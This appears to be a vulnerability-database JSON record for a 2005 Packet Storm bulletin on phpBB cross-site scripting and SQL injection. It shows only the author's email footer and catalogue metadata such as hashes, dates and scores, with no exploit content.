\nhref=3D\"http://digitalparadox.org/\">http://digitalparadox.org/</A>. = \nLookout for my=20 \nsoon to come out book on Secure coding with = \nphp.</DIV></FONT></BODY></HTML> \n \n------=_NextPart_000_0009_01C5406C.5DF1F1F0-- \n`\n", "edition": 1, "references": [], "modified": "2005-04-19T00:00:00", "hash": "367a1c9eca3775777946a949c9fd40e12e6e631852ca591f351fce7b8cd1f649", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/37205/dc_phpbb_xss_sql.txt.html", "description": "", "id": "PACKETSTORM:37205", "reporter": "Diabolic Crab", "lastseen": "2016-11-03T10:23:33", "published": "2005-04-19T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:33"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "dc_phpbb_xss_sql.txt", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "3fb8d352a41589e272d87e5373e52822", "key": "href"}, {"hash": "3c20dd12fee6f1a8f15f3c524aaa24f6", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "3c20dd12fee6f1a8f15f3c524aaa24f6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a946d181a47e09047bb320d165e89664", "key": "reporter"}, {"hash": "4eeba4b73237f08f0764ce0422e69d4a", "key": "sourceData"}, {"hash": "f8516edabfa9474a834a0f45eb0149bd", "key": "sourceHref"}, {"hash": "f4bff9ef74eee20db4ceeff44a587a33", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}